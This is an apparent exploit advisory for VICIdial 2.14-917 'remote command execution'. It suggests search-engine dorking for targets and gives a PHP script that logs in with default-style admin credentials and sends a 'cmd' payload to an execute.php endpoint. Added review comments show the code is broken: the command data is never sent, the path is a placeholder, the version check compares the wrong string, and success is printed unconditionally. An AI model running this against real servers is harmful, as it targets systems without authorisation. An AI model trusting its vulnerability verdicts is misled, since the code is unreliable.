VICIdial 2.14-917 Remote Command Execution
VICIdial 2.14-917 Remote Command Execution
=============================================================================================================================================
| # Title : VICIdial v 2.14-917 PHP Execute system commands |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://www.vicidial.org/ |
=============================================================================================================================================

POC :

[+] Dorking in Google or other search engine.

[+] Code Description: Execute system commands indirectly to bypass security restrictions.

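(Related: https://packetstorm.news/files/id/181461/ — related CVE: CVE-2024-8504.) Note that the code below addresses a generic `execute.php` path and uses sample credentials, so its "Vulnerable"/"Safe" output is not a substitute for checking the installed VICIdial build against the vendor's fix for that CVE.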

[+] Set Target : line 73

[+] Usage : php poc.php

[+] PayLoad :


<?php

/**
 * Proof-of-concept client from the advisory. It reads a version banner from the agent
 * page, sends HTTP Basic credentials to the admin page, and then calls executePayload().
 *
 * NOTE(review): as written, the listing does not demonstrate command execution.
 * executePayload() passes a third argument that sendRequest() does not declare, and the
 * request is addressed to a generic /execute.php path. Its output should not be used to
 * judge exposure to the CVE referenced in the advisory text.
 *
 * For detection: the visible request sequence is an unauthenticated fetch of
 * /agc/vicidial.php followed by /vicidial/admin.php?ADD=3&user=<name> carrying an
 * Authorization: Basic header, all from the same client.
 */
class VICIdialExploit {
// Base URL of the target, with no trailing slash; paths are appended directly.
private $target;
// Account name, used both in the Basic auth header and in the admin.php query string.
private $username;
// Password for the account above; sent base64-encoded (not encrypted) in the header.
private $password;

/**
 * Stores the connection settings; performs no I/O.
 *
 * @param string $target   Base URL of the VICIdial host.
 * @param string $username Account name.
 * @param string $password Account password.
 */
public function __construct($target, $username, $password) {
$this->target = $target;
$this->username = $username;
$this->password = $password;
}

/**
 * Fetches /agc/vicidial.php without credentials and classifies the version banner.
 *
 * @return string "Unknown" when the request fails or no banner is found,
 *                otherwise "Vulnerable" or "Safe".
 */
public function checkVulnerability() {
$url = "$this->target/agc/vicidial.php";
$response = $this->sendRequest($url);

// No body, or no version label in it: nothing to classify.
if (!$response || strpos($response, 'VERSION:') === false) {
return "Unknown";
}

preg_match('/VERSION:\s*(\d+\.\d+)-(\d+)/', $response, $matches);
// $matches[0] is the whole match, so it still carries the "VERSION:" label text.
$version = isset($matches[0]) ? $matches[0] : '';

if (!$version) {
return "Unknown";
}

// NOTE(review): the compared string includes the label, not just the number, which
// appears to make this verdict unreliable; neither result is evidence of patch status.
return version_compare($version, '2.14-917a', '<=') ? "Vulnerable" : "Safe";
}

/**
 * Sends Basic credentials to the admin page, then hands a fixed string to executePayload().
 *
 * Terminates the script via die() when the admin request returns no body.
 */
public function exploit() {
$auth = base64_encode("$this->username:$this->password");

$headers = [
"Authorization: Basic $auth"
];

// The username is interpolated into the query string without URL-encoding.
$url = "$this->target/vicidial/admin.php?ADD=3&user=$this->username";
$response = $this->sendRequest($url, $headers);

// Only an empty/false body counts as failure; the HTTP status is never inspected,
// so a rejected login that returns a body is still reported as success below.
if (!$response) {
die("Failed to authenticate");
}

echo "Authenticated successfully.\n";

// NOTE(review): the original comment here was lost to mis-encoding.
$payload = "echo 'Hacked';"; // original trailing comment unreadable (mis-encoded)
$this->executePayload($payload);
}

/**
 * Performs a cURL request with the given headers and returns the body.
 *
 * No request body, method, timeout or TLS option is set here, so cURL defaults apply.
 *
 * @param string   $url     Full URL to request.
 * @param string[] $headers Raw header lines passed to CURLOPT_HTTPHEADER.
 * @return string|false Response body, or false when curl_exec() fails.
 */
private function sendRequest($url, $headers = []) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}

/**
 * Builds a form-encoded "cmd" field and calls sendRequest().
 *
 * NOTE(review): sendRequest() declares only ($url, $headers), so $data passed below is
 * not used by it, and the result of the call is discarded. The success message is
 * printed unconditionally.
 *
 * @param string $payload String placed in the "cmd" field.
 */
private function executePayload($payload) {
// NOTE(review): original trailing comment unreadable; this path looks like a placeholder — confirm.
$url = "$this->target/execute.php";
$headers = ["Content-Type: application/x-www-form-urlencoded"];
$data = "cmd=" . urlencode($payload);

$this->sendRequest($url, $headers, $data);
echo "Payload executed.\n";
}
}

// Placeholder connection settings from the listing (the original inline comment
// on the target line was lost to mis-encoding).
$target = "http://example.com";
$username = "admin";
$password = "admin123";

$exploit = new VICIdialExploit($target, $username, $password);
$status = $exploit->checkVulnerability();

// Only the exact string "Vulnerable" continues; both "Safe" and "Unknown"
// produce the same negative message, so that message does not mean "patched".
if ($status !== "Vulnerable") {
    echo "Target is not vulnerable.\n";
} else {
    echo "Target is vulnerable.\n";
    $exploit->exploit();
}


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================